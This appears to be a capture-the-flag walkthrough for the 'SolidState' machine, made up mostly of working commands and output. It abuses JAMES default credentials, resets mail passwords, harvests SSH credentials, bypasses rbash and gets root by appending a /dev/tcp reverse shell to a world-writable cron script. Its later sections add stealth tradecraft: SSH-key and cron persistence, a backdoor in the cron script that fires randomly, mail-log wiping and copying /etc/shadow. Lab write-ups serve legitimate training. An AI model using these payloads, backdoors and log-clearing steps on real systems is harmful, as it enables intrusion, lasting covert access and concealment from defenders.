Machine Synopsis
Key Exploitation Techniques:
- JAMES Remote Administration Tool default credentials exploitation
- Email server user enumeration and password manipulation
- Email content analysis for SSH credential discovery
- Restricted shell bypass via SSH command execution
- Cronjob exploitation through writable script overwrite
Reconnaissance & Enumeration
Port Discovery
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| $ nmap -sC -sV -A -p- 10.10.10.51
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
|
Key Services:
- JAMES Mail Server (SMTP, POP3, NNTP)
- JAMES Remote Administration Tool (port 4555)
- Apache web server
Web Application Analysis
The website shows “Solid State Security” company page with minimal functionality and no obvious attack vectors.
1
2
| # Directory enumeration yields no significant results
$ gobuster dir -u http://10.10.10.51 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
Exploitation
Default Credential Testing
1
2
3
4
5
6
7
8
9
10
| # Connect to JAMES Remote Administration Tool
$ nc -v 10.10.10.51 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
|
Success: Default credentials root:root
provide administrative access.
User Enumeration and Password Reset
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| # List existing mail accounts
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
# Reset all user passwords to 'password'
setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset
|
Email Content Analysis
POP3 Access and Email Retrieval
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| # Access john's mailbox
$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS password
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
QUIT
|
Credential Discovery in mindy’s Mailbox
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| # Access mindy's mailbox
$ telnet 10.10.10.51 110
USER mindy
+OK
PASS password
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
|
SSH Credentials: mindy:P@55W0rd1!2@
SSH Access and Restricted Shell Bypass
Initial SSH Connection
1
2
3
4
5
6
7
8
| $ ssh mindy@10.10.10.51
mindy@10.10.10.51's password: P@55W0rd1!2@
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
mindy@solidstate:~$ id
-rbash: id: command not found
|
Restriction: User is in a restricted bash shell (rbash).
Restricted Shell Bypass
Method 1: SSH Command Execution
1
2
3
4
5
| # Execute commands directly via SSH
$ ssh mindy@10.10.10.51 -t "bash --noprofile"
mindy@10.10.10.51's password: P@55W0rd1!2@
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
|
Method 2: Apache James RCE (Alternative)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| # Using searchsploit for Apache James exploit
$ searchsploit Apache James Server 2.3.2
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
# Download and modify exploit
$ searchsploit -m 35513
$ python 35513.py 10.10.10.51
# Setup netcat listener
$ nc -nlvp 1234
# Payload executes when user logs into email
# Triggers reverse shell as mindy
# Reverse shell received
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 48670
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
914d0a4ebc177889b5b89a23f556fd75
|
Privilege Escalation
System Enumeration
1
2
3
4
| # Transfer LinPEAS for enumeration
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./linpeas.sh
|
Cronjob Discovery
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| # LinPEAS reveals interesting file in /opt
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 Apr 26 2021 ..
drwxr-xr-x 11 root root 4096 Apr 26 2021 james-2.3.2
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
|
Key Finding: /opt/tmp.py
is world-writable and appears to be executed periodically.
Process Monitoring
1
2
3
4
5
6
7
8
| # Transfer and run pspy for process monitoring
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./pspy32
# Process execution observed
2022/05/09 04:03:01 CMD: UID=0 PID=1716 | /bin/sh -c python /opt/tmp.py
2022/05/09 04:03:01 CMD: UID=0 PID=1717 | python /opt/tmp.py
|
Confirmation: /opt/tmp.py
is executed by root via cronjob.
Cronjob Exploitation
Payload Creation and Deployment
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| # Create Python reverse shell payload
$ cat > py_revshell << 'EOF'
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
EOF
# Host payload
$ python3 -m http.server 80
# Append payload to tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ curl http://10.10.14.8/py_revshell >> tmp.py
# Verify modification
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
|
Root Shell Acquisition
1
2
3
4
5
6
7
8
9
10
| # Setup netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...
# Wait for cronjob execution
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 40852
root@solidstate:~# whoami
root
root@solidstate:~# cat /root/root.txt
b4c9723a28899b1c45db281d99cc87c9
|
Post-Exploitation Techniques
Persistence Methods
SSH Key Persistence
1
2
3
4
5
6
7
| # Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f solidstate_persistence
# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
|
JAMES Mail Server Backdoor
1
2
3
4
5
6
7
| # Create mail account for persistence
# echo "adduser backdoor password123" | nc 10.10.10.51 4555
# Modify mail templates for code execution
# cat > /root/apps/james/SAR-INF/config.xml << 'EOF'
# [Include malicious mail processing rules]
# EOF
|
Cron Backdoor Maintenance
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| # Create more sophisticated backdoor
# cat > /opt/system_check.py << 'EOF'
#!/usr/bin/env python
import subprocess
import time
import socket
def check_connection():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("10.10.14.8", 4444))
subprocess.call(["/bin/bash", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
s.close()
except:
pass
check_connection()
EOF
# Add to crontab
# echo "*/10 * * * * /usr/bin/python /opt/system_check.py" >> /etc/crontab
|
Defense Evasion
Mail Server Log Cleanup
1
2
3
4
5
6
7
| # Clear JAMES mail logs
# > /root/apps/james/logs/mailet.log
# > /root/apps/james/logs/james.log
# Clear system mail logs
# > /var/log/mail.log
# > /var/log/mail.err
|
Process Hiding
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| # Modify cronjob execution to be less obvious
# cat > /opt/tmp.py << 'EOF'
#!/usr/bin/env python
import os
import sys
import time
import random
# Original cleanup function
try:
os.system('rm -r /tmp/* ')
except:
pass
# Hidden backdoor with random delay
time.sleep(random.randint(1, 30))
if random.randint(1, 10) == 5: # Execute 10% of the time
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1' &")
sys.exit()
EOF
|
Lateral Movement Preparation
Email Server Exploitation
1
2
3
4
| # Enumerate all mail accounts and passwords
# Connect to JAMES admin tool and extract user list
# Access all mailboxes for credential discovery
# Search for additional systems and credentials in emails
|
Network Discovery
1
2
3
4
5
| # Discover email-related infrastructure
# ss -tlnp | grep -E "(25|110|143|993|995)"
# Scan for internal mail servers
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done
|
Credential Harvesting
1
2
3
4
5
6
7
8
| # Extract mail database if present
# find /root/apps/james -name "*.db" -exec cp {} /tmp/ \;
# Search mail content for credentials
# grep -r "password\|pass\|credential" /root/apps/james/var/mail/
# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup
|
Alternative Exploitation Methods
Direct JAMES Exploitation
1
2
3
4
5
6
7
8
9
10
| # Alternative Apache James RCE exploit
$ python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
# Trigger by SSH login as any user
$ ssh mindy@10.10.10.51
|
SMTP Enumeration
1
2
3
4
5
| # SMTP user enumeration
$ smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51
# SMTP relay testing
$ swaks --to test@10.10.10.51 --from test@attacker.com --server 10.10.10.51
|
Alternative Privilege Escalation
Kernel Exploitation
1
2
3
4
5
6
| # Check kernel version
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux
# Search for applicable exploits
$ searchsploit linux kernel 4.9 | grep -i privilege
|
SUID Binary Analysis
1
2
3
4
5
| # Find SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ find / -perm -4000 -type f 2>/dev/null
# Check for custom SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /usr/local/bin/
|